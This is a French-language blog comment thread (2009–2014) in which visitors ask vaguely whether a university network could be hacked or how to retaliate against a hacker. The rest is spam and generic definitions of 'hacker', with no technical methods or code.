Merci...simple curiosité Bravi pour ce blog, un peu malin mais inevitablement interessant...sourire!!

voilà, j'ai juste une simple question, histoire de satisfaire ma curiosité et aussi surtout pour ne pas perdre un pari avec un ami, qui d'ailleurs est un excellent informaticien.
j'aimerai savoir s'il y a possibilité de pirater un reseau d'une université, s'enregistrer sur leur systeme comme etudiant pendant années precedentes??
lui me dit que c'est possible, moi je trouve non encore moins en algerie!!
merci de me repondre

Écrit par : wafa | 25/05/2009

wafa votre réponse il a raison votre ami c possible vous pouvez même accéder dans les grandes entreprises et les administrations gouvernementales grâce au piratage d'ailleur Kevin Poulsen alias Dark Dante fracturant les ordinateurs du FBI lol, de la NSA (National Security Agency) et de la compagnie de téléphone Pacific Bell, Kevin Poulsen a été bêtement arrêté en 1990 à la suite d'une audacieuse tentative de tricherie alors comment voulez vous Que le réseaux informatique universitaire ne se pirate pas je veux dire pour eux un réseau universitaire c rien ;)

Écrit par : Dark Dante | 29/05/2009

M'suis faite hacker mais je crois savoir qui c'est Bonjour a vous,
Voilou je me suis faite hacker hier soir a 21h, je sais d'ou viens le "proxy" utilisé, mais je ne sais pas comment rendre la pareille a cette personne je suis sous 20dose, et lui sous Mac, je ne paie jamais rien via mon pc, puisque je suis en liquidation judiciaire, donc pas une thune!!
Si quelqu'un aurait la gentillesse de m'aider meme en rentrant sur mon pc (vous dire comme quoi il n'y a vraiment rien de bien a prendre ds mon pc) je lui en serai reconnaissante a jamais!
voilou les pros du hacking et autres! ;)
Biz
Marre

Écrit par : Marre | 24/06/2010

Hallo, Pills u0026 voeding huwelijk! algiers.skynetblogs.be Voor de eerste keer publiceert een belangrijk werk van genezen veel ziekten en degeneratieve discopathie met spinale ASTREYA ongebruikelijke systeem.rnAls u : voelde pijn in zijn rug of nekpijn of rugpijn leek of pijnlijke onderrug , dan heeft u waarschijnlijk osteochondrose en bezoek onze websitecervicale thoracale osteochondrosis
en toch is er een mysterie voorrncure artrose ( en nog veel meer ) met behulp van de techniek ASTREYA . osteochondrosis
Good luck !

Écrit par : WetsCrensecen | 18/11/2011

inchale an hacker sit de i.s.r

Écrit par : belkacem | 23/01/2013

bien

Écrit par : amine | 11/11/2013

Avoir un blog toujours à jour est très important pour garder le contact avec ces internautes, tout à l'instar des commentaires c'est pour ça que nous vous laisse cette remarque pour vous encourager.

Écrit par : bonus paris sportifs en ligne | 05/05/2014

Avoir un blogue souvent à jour est très indispensable pour conserver le contact avec ces internautes, tout comme les commentaires c'est pour ça que nous vous laisse cette remarque pour vous encourager.

Écrit par : france honduras les cotes | 12/06/2014

Un hacker est une personne qui aime explorer les limites de ce qui est possible, dans un esprit de l'intelligence espiègle. Ils peuvent aussi fortement modifier le logiciel ou le matériel de leur propre système informatique.

Écrit par : motivation letter | 02/08/2014

Hacker est un terme qui a été utilisé pour signifier une variété de choses différentes en informatique. Selon le contexte, bien que le terme peut se référer à une personne dans l'une quelconque de plusieurs communautés et sous-cultures complètement disjointes distinctes mais non.

Écrit par : yelp.com | 11/09/2014

bonsoir je me nomme coulibaly jaimerai apprendre plus avec vous comment faire a lors si tu as skype en voi le moi je serai ravi de parle avec vous

Écrit par : aboubakar | 02/11/2014

Les commentaires sont fermés.